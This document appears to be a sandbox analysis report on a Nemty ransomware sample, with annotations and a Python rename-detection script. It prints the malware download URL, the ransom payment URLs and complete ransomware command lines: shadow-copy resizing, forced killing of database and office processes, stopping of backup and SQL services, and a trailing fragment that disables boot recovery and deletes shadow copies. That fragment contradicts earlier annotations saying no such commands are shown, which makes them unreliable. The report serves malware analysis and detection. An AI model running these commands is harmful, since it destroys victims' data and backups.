Analysis

max time kernel: 150s
max time network: 152s
platform: windows10_x64
resource: win10v191014
submitted: 14-02-2020 02:22

Static task: static1
Behavioral task: behavioral1
Sample: http://92.63.197.190/jap.exe
Resource: win10v191014

General

Target: http://92.63.197.190/jap.exe
Sample: 200214-87w9zpv2l2

Malware Config

Extracted from: C:\NEMTY_MLK8D17-DECRYPT.txt
Family: nemty
URLs:
http://nemty.top/public/pay.php
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures

Executes dropped EXE (1 IoC)
Processes (pid / process):
4756 jap.exe

Program crash (1 IoC)
Processes (pid / process -> target pid / target process):
3752 WerFault.exe -> 3412 powershell.exe
The crashed powershell.exe was started by jap.exe (PID 4756; see the WriteProcessMemory entries below). Its command line is not in the process tree as captured in this report, so whatever jap.exe tried to do through PowerShell did not complete and cannot be read off this page.

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
No vssadmin delete shadows appears in the tree (a WMIC.exe child of cmd.exe PID 524 is recorded under WriteProcessMemory, but its command line is not shown). The mechanism visible in this run is the pair of vssadmin resize shadowstorage commands in the process tree: capping the shadow storage area for C: at 401MB forces the Volume Shadow Copy service to discard existing snapshots that no longer fit, and the follow-up /maxsize=unbounded restores the unlimited setting afterwards. The effect is the same as an explicit delete, but rules that only match "delete shadows" miss it.

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
All three reads here are by taskmgr.exe (PID 2508), not by jap.exe; treat the hit as environment noise rather than anti-analysis logic in the sample.
Processes (description / ioc / process):
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 (taskmgr.exe)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName (taskmgr.exe)

Suspicious use of SetWindowsHookEx (6 IoCs)
Browser-only: the hook calls come from the Internet Explorer instance used to download the sample, not from jap.exe.
Processes (pid / process):
5096 iexplore.exe (2 entries)
384 IEXPLORE.EXE (4 entries)

Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid / process):
3852 vssadmin.exe
4372 vssadmin.exe

Modifies registry class (1 IoC)
Processes (description / ioc / process):
Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings (cmd.exe)

Kills process with taskkill (14 IoCs)
Processes (pid / process), all taskkill.exe:
1292, 2900, 448, 1156, 1400, 3464, 660, 1588, 800, 836, 944, 1348, 4616, 1020
Fourteen taskkill /f /im invocations against wildcarded image names (database, office, mail, virtualisation, Node, QuickBooks and Teams processes; see the process tree), run so that open handles do not block encryption of those applications' files.

Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
Modifies Internet Explorer settings
Every entry is a write by iexplore.exe / IEXPLORE.EXE under \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\ (ordinary browser state from fetching the sample URL, not behaviour of jap.exe). Paths below are relative to that key.
Processes (description / ioc / process):
Key created Main (IEXPLORE.EXE)
Set value (int) VersionManager\LastCheckForUpdateHighDateTime = "30794470" (iexplore.exe)
Set value (data) TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000295265d942d0de48805329f67cc9983800000000020000000000106600000001000020000000d7c88b58e741d1e449c736ce667c95f7ed236c93511e1f29ce6289d3f629dc0e000000000e80000000020000200000001d8ae9f11f66c5056c9951a7947235506848e2442ab0b56ec5916dbb8216ea6720000000f197656101136b89028a6a31ee589419413e74735863d62714d22fab258531d44000000083f6d6009a5c6ac11df9ac768bbdf6339536b251388615fb241b0506b318d4611c98f6975504460d9991f730b346d818fde53b8393e2797e88a47a713b8bc7ef (iexplore.exe)
Set value (data) TabbedBrowsing\NewTabPage\LastProcessed = 30ed2f17e6e2d501 (iexplore.exe)
Set value (int) Main\CompatibilityFlags = "0" (iexplore.exe)
Set value (data) Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 (iexplore.exe)
Set value (int) VersionManager\LastUpdateLowDateTime = "190425451" (iexplore.exe)
Set value (int) VersionManager\LastCheckForUpdateLowDateTime = "190425451" (iexplore.exe)
Key created DomainSuggestion\FileNames\ (iexplore.exe)
Key created DomainSuggestion\FileNames (iexplore.exe)
Set value (int) VersionManager\LastUpdateHighDateTime = "30794470" (iexplore.exe)
Set value (int) VersionManager\LastTTLHighDateTime = "50" (iexplore.exe)
Key created TabbedBrowsing (iexplore.exe)
Set value (data) TabbedBrowsing\NewTabPage\LastProcessed = 500bbb16e6e2d501 (iexplore.exe)
Set value (int) Recovery\AdminActive\{347DCB3E-4ED9-11EA-BD7F-729D8330D557} = "0" (iexplore.exe)
Key created MINIE (iexplore.exe)
Key created VersionManager (iexplore.exe)
Set value (data) TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000295265d942d0de48805329f67cc9983800000000020000000000106600000001000020000000167a55a9a1403a8c6b5a723521f2c24008cd8a1401bdb6fb0c64e9b220c62b9b000000000e8000000002000020000000f6924af894d1b35a840d49343426719cebcb88a27d033e0bff8a80cb88d2915a2000000045ecc9de6bdfda3134ba1a00581c2a0702959bfb2826ddce24cdb81a15cfc81e4000000015b7e473ae4a1033dc2b722e41b67489f77c94fe94d31883369b882c97c14bad7b6d8fd6e0e1ca3da9c8a4131f946cb2ff24f21b4febddafb8ced1ea01a44764 (iexplore.exe)
Key created Main\WindowsSearch (iexplore.exe)
Set value (int) Recovery\PendingRecovery\AdminActive = "0" (iexplore.exe)
Set value (data) PhishingFilter\ClientSupported_MigrationTime = 4c6bfe76f785d501 (iexplore.exe)
Key created Main (iexplore.exe)
Key created Recovery\AdminActive (iexplore.exe)
Key created PhishingFilter (iexplore.exe)
Set value (str) RepId\PublicId = "{C32CDA77-894E-41F6-99DC-FD5B6918BD01}" (iexplore.exe)
Key created DomainSuggestion (iexplore.exe)
Set value (str) DomainSuggestion\FileNames\en-US = "en-US.1" (iexplore.exe)
Set value (int) DomainSuggestion\NextUpdateDate = "288415526" (iexplore.exe)
Set value (str) Main\WindowsSearch\Version = "WS not running" (iexplore.exe)
Key created RepId (iexplore.exe)
Set value (int) VersionManager\LastTTLLowDateTime = "1251635200" (iexplore.exe)
Key created Main (IEXPLORE.EXE)
Set value (int) TabbedBrowsing\NTPFirstRun = "1" (iexplore.exe)
Key created TabbedBrowsing\NewTabPage (iexplore.exe)
Set value (data) Main\DownloadWindowPlacement = 2c0000000000000000000000fffffffffffffffffffffffffffffffff30100004d000000730400002d020000 (iexplore.exe)
Set value (str) Main\FullScreen = "no" (iexplore.exe)
Key created Recovery\PendingRecovery (iexplore.exe)
Set value (int) MINIE\TabBandWidth = "500" (iexplore.exe)
Suspicious behavior: EnumeratesProcesses (107 IoCs)
Only the two jap.exe entries belong to the sample; taskmgr.exe and WerFault.exe enumerate processes as part of their normal function, and the report lists a subset of the 107 entries.
Processes (pid / process):
4756 jap.exe 4756 jap.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 2508 taskmgr.exe 3752 WerFault.exe 3752 WerFault.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe
Drops file in Program Files directory (58 IoCs)
All 58 entries are jap.exe. Each data file listed is both opened for modification and renamed with the .NEMTY_MLK8D17 suffix, the footprint of in-place encryption followed by a rename; the ransom note is created, then reopened, in each Program Files root.
Processes (description / ioc / process):
File opened for modification and renamed to <name>.NEMTY_MLK8D17 (27 files, all under C:\Program Files\):
OutUnpublish.tiff, SetSubmit.m1v, UseWatch.asx, AddInitialize.emf, DisablePush.M2V, MeasureDisconnect.mp2v, MoveProtect.3g2, PingSubmit.txt, TestCheckpoint.vsdm, ApproveRepair.bin, OptimizeWrite.pptx, WatchAdd.rtf, DisableDisconnect.asx, ReadRedo.reg, MergeWatch.pps, PublishComplete.ppsx, SearchConnect.pps, TestUnpublish.ico, AddAssert.emz, ImportPop.mpg, UnprotectRevoke.mpa, DismountGet.css, SuspendTrace.xlsx, RepairHide.zip, ConfirmMerge.asx, GroupMove.vbe, ConfirmHide.xml
File created and then opened for modification:
C:\Program Files\NEMTY_MLK8D17-DECRYPT.txt
C:\Program Files (x86)\NEMTY_MLK8D17-DECRYPT.txt
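File-system telemetry alone identifies this infection without any process context: one suffix appended to many files of different types, plus a note whose name carries the same per-victim marker. The Python below is an added example, not part of the sandbox report. It replays a subset of the rename/create/modify IoCs listed above (paths copied from the report, order as listed there, plus one constructed benign rename as a control) and derives the appended extension, the number of files hit, whether they were also opened for modification, the original file types and the ransom-note file name. The two thresholds are assumptions.

```python
import ntpath
from collections import defaultdict

# Constructed from the IoCs above: (action, path, new path or None).  Order is
# as listed in the report, which is not guaranteed to be chronological.  The
# last record is a constructed benign control (one file renamed to .bak).
EVENTS = [
    ("renamed",  r"C:\Program Files\OutUnpublish.tiff", r"C:\Program Files\OutUnpublish.tiff.NEMTY_MLK8D17"),
    ("modified", r"C:\Program Files\SetSubmit.m1v", None),
    ("modified", r"C:\Program Files\UseWatch.asx", None),
    ("created",  r"C:\Program Files (x86)\NEMTY_MLK8D17-DECRYPT.txt", None),
    ("modified", r"C:\Program Files\NEMTY_MLK8D17-DECRYPT.txt", None),
    ("modified", r"C:\Program Files\AddInitialize.emf", None),
    ("renamed",  r"C:\Program Files\AddInitialize.emf", r"C:\Program Files\AddInitialize.emf.NEMTY_MLK8D17"),
    ("renamed",  r"C:\Program Files\DisablePush.M2V", r"C:\Program Files\DisablePush.M2V.NEMTY_MLK8D17"),
    ("renamed",  r"C:\Program Files\UseWatch.asx", r"C:\Program Files\UseWatch.asx.NEMTY_MLK8D17"),
    ("created",  r"C:\Program Files\NEMTY_MLK8D17-DECRYPT.txt", None),
    ("modified", r"C:\Program Files\DisablePush.M2V", None),
    ("renamed",  r"C:\Program Files\SetSubmit.m1v", r"C:\Program Files\SetSubmit.m1v.NEMTY_MLK8D17"),
    ("modified", r"C:\Program Files\OutUnpublish.tiff", None),
    ("renamed",  r"C:\Program Files\App\config.ini", r"C:\Program Files\App\config.ini.bak"),
]

MIN_RENAMES = 3       # assumption: renames that share one appended suffix
MIN_SOURCE_TYPES = 2  # assumption: distinct original extensions under that suffix


def appended_suffix(src, dst):
    """Suffix a rename appended to the whole original name (dst == src + suffix), else None."""
    if len(dst) > len(src) and dst[:len(src)].lower() == src.lower():
        return dst[len(src):]
    return None


def summarise(events):
    """Group appended-suffix renames and report the groups that look like mass encryption."""
    originals = defaultdict(list)          # suffix -> original paths renamed with it
    modified = {p.lower() for kind, p, _ in events if kind == "modified"}
    created = [p for kind, p, _ in events if kind == "created"]
    for kind, src, dst in events:
        if kind != "renamed":
            continue
        suffix = appended_suffix(src, dst)
        if suffix:
            originals[suffix].append(src)

    findings = []
    for suffix, paths in originals.items():
        # ntpath handles the Windows paths regardless of the host OS.
        source_types = sorted({ntpath.splitext(p)[1].lower() for p in paths})
        if len(paths) < MIN_RENAMES or len(source_types) < MIN_SOURCE_TYPES:
            continue        # one .bak, or a backup tool touching a single file type
        marker = suffix.lstrip(".").lower()
        # The ransom note reuses the per-victim marker from the extension in its name.
        notes = sorted({ntpath.basename(p) for p in created
                        if marker in ntpath.basename(p).lower()})
        findings.append({
            "suffix": suffix,
            "files": len(paths),
            "also_modified": sum(p.lower() in modified for p in paths),
            "source_types": source_types,
            "ransom_notes": notes,
        })
    return findings


if __name__ == "__main__":
    for finding in summarise(EVENTS):
        print(finding)
```

The control rename (.bak on one file) never reaches the threshold, while the NEMTY group is flagged with five files of five different types, all of which were also opened for modification, and the note name is recovered from the marker shared between extension and note.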
Modifies service (2 TTPs, 4 IoCs)
Processes (description / ioc / process):
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
These are the VSS service's own writer-diagnostic keys, written by vssvc.exe once the vssadmin calls started it; no service configuration was changed by jap.exe. The service impact from the sample is the net stop chain in the process tree, which stops services rather than reconfiguring them.
Modifies system certificate store
Processes (description / ioc / process):
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE (jap.exe)
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE\Blob = (blob value omitted) (jap.exe)
AuthRoot is the store that Windows' automatic root update fills on demand when CryptoAPI builds a chain to a root it has not yet cached, and 75E0ABB6138512271C04F85FDDDE38E4B7242EFE is the SHA-1 thumbprint of the public GlobalSign Root CA - R2. The footprint is consistent with jap.exe making an HTTPS connection from a fresh image, not with it planting a root of its own; a planted root would normally appear under SystemCertificates\ROOT with a thumbprint outside the Microsoft trusted root list.
Checks whether UAC is enabled
Processes (description / ioc / process):
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (iexplore.exe)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (IEXPLORE.EXE)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (IEXPLORE.EXE)
All three reads are the browser's, not jap.exe's.
Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes (description / ioc / process):
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WerFault.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WerFault.exe)

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
This and the BIOS lookup above are WerFault.exe (PID 3752) collecting machine details for the powershell.exe crash report, not jap.exe fingerprinting the sandbox.
Processes (description / ioc / process):
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WerFault.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WerFault.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WerFault.exe)
Suspicious use of WriteProcessMemory (180 IoCs)
Every pair below is a parent writing into a child it has just created, and each pair is logged three times; the entries line up one-to-one with process creation in the tree, so this is spawn noise rather than code injection. Two children recorded here are absent from the process tree excerpt further down: powershell.exe (PID 3412, launched directly by jap.exe and later crashed under WerFault.exe) and WMIC.exe (PID 4752, launched by cmd.exe PID 524). Neither command line is shown in this report. The report lists 64 of the 180 entries.
Processes (parent pid / parent image -> target pid / target image; 3 entries each unless stated):
5096 iexplore.exe -> 384 IEXPLORE.EXE
5096 iexplore.exe -> 3704 IEXPLORE.EXE
5096 iexplore.exe -> 4756 jap.exe
4756 jap.exe -> 4536 cmd.exe
4756 jap.exe -> 4508 cmd.exe
4508 cmd.exe -> 4372 vssadmin.exe
4536 cmd.exe -> 3852 vssadmin.exe
4756 jap.exe -> 4340 cmd.exe
4756 jap.exe -> 4888 cmd.exe
4756 jap.exe -> 524 cmd.exe
4756 jap.exe -> 3412 powershell.exe
4340 cmd.exe -> 800 taskkill.exe
4888 cmd.exe -> 4976 net.exe
524 cmd.exe -> 4752 WMIC.exe
4976 net.exe -> 3596 net1.exe
4340 cmd.exe -> 3464 taskkill.exe
4340 cmd.exe -> 1292 taskkill.exe
4340 cmd.exe -> 4616 taskkill.exe
4340 cmd.exe -> 2900 taskkill.exe
4340 cmd.exe -> 448 taskkill.exe
4340 cmd.exe -> 660 taskkill.exe
4340 cmd.exe -> 836 taskkill.exe (1 entry; list truncated here)
Suspicious use of FindShellTrayWindow (102 IoCs)
GUI noise from Internet Explorer, Task Manager and the crash reporter; no jap.exe entry. The report lists a subset of the 102 entries.
Processes (pid / process):
5096 iexplore.exe 5096 iexplore.exe 5096 iexplore.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 3752 WerFault.exe 2508 taskmgr.exe 5096 iexplore.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe
Suspicious use of AdjustPrivilegeToken (65 IoCs)
The taskkill.exe entries (SeDebugPrivilege, needed to terminate processes it does not own) are the ones attributable to the sample's command chain. WMIC.exe routinely enables every privilege available to its token at startup, and vssvc.exe, WerFault.exe and taskmgr.exe enable the privileges their normal work requires.
Processes (token privilege / pid / process), grouped by process:
vssvc.exe (2976): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
WMIC.exe (4752), the full list logged twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
taskkill.exe: SeDebugPrivilege, one entry each for PIDs 800, 3464, 1292, 4616, 2900, 448, 660, 836, 1020, 944, 1156, 1348, 1400, 1588
WerFault.exe (3752): SeRestorePrivilege, SeBackupPrivilege
taskmgr.exe (2508): SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege
Suspicious use of SendNotifyMessage (96 IoCs)
Task Manager window-message noise; no jap.exe entry.
Processes (pid / process):
2508 taskmgr.exe, repeated for every entry listed
Runs net.exe
Processes

Image paths below are C:\Windows\SysWOW64\... while the command lines name C:\Windows\System32\...: jap.exe is a 32-bit process, so WoW64 file-system redirection maps System32 to SysWOW64 for every tool it launches. Detection content that keys on the System32 image path misses these children; match on the file name or on both directories. The tree as captured ends at the last net stop; the powershell.exe child (PID 3412) and the cmd.exe / WMIC.exe chain (PIDs 524 / 4752) recorded under WriteProcessMemory are not shown.

[1] C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://92.63.197.190/jap.exe
    - Suspicious use of SetWindowsHookEx
    - Modifies Internet Explorer settings
    - Checks whether UAC is enabled
    - Suspicious use of WriteProcessMemory
    - Suspicious use of FindShellTrayWindow
  [2] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5096 CREDAT:82945 /prefetch:2
      - Suspicious use of SetWindowsHookEx
      - Modifies Internet Explorer settings
      - Checks whether UAC is enabled
  [2] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5096 CREDAT:340998 /prefetch:2
      - Modifies Internet Explorer settings
      - Checks whether UAC is enabled
  [2] C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Drops file in Program Files directory
      - Modifies system certificate store
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\vssadmin.exe
          vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
          - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\vssadmin.exe
          vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
          - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im sql.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im winword.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im wordpad.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im outlook.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im thunderbird.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im oracle.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im excel.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im onenote.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im virtualboxvm.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im node.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im QBW32.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WBGX.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im Teams.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im Flow.*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\net.exe
          net stop DbxSvc
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop DbxSvc
      [4] C:\Windows\SysWOW64\net.exe
          net stop OracleXETNSListener
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop OracleXETNSListener
      [4] C:\Windows\SysWOW64\net.exe
          net stop OracleServiceXE
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop OracleServiceXE
      [4] C:\Windows\SysWOW64\net.exe
          net stop AcrSch2Svc
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop AcrSch2Svc
      [4] C:\Windows\SysWOW64\net.exe
          net stop AcronisAgent
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop AcronisAgent
      [4] C:\Windows\SysWOW64\net.exe
          net stop Apache2.4
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop Apache2.4
      [4] C:\Windows\SysWOW64\net.exe
          net stop SQLWriter
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop SQLWriter
      [4] C:\Windows\SysWOW64\net.exe
          net stop MSSQL$SQLEXPRESS
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
      [4] C:\Windows\SysWOW64\net.exe
          net stop MSSQLServerADHelper100
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop MSSQLServerADHelper100
      [4] C:\Windows\SysWOW64\net.exe
          net stop MongoDB
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop MongoDB
      [4] C:\Windows\SysWOW64\net.exe
          net stop SQLAgent$SQLEXPRESS
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
      [4] C:\Windows\SysWOW64\net.exe
          net stop SQLBrowser
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop SQLBrowser
      [4] C:\Windows\SysWOW64\net.exe
          net stop CobianBackup11
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop CobianBackup11
      [4] C:\Windows\SysWOW64\net.exe
          net stop cbVSCService11
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop cbVSCService11
      [4] C:\Windows\SysWOW64\net.exe
          net stop QBCFMontorService
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop QBCFMontorService
      [4] C:\Windows\SysWOW64\net.exe
          net stop QBVSS
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop QBVSS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
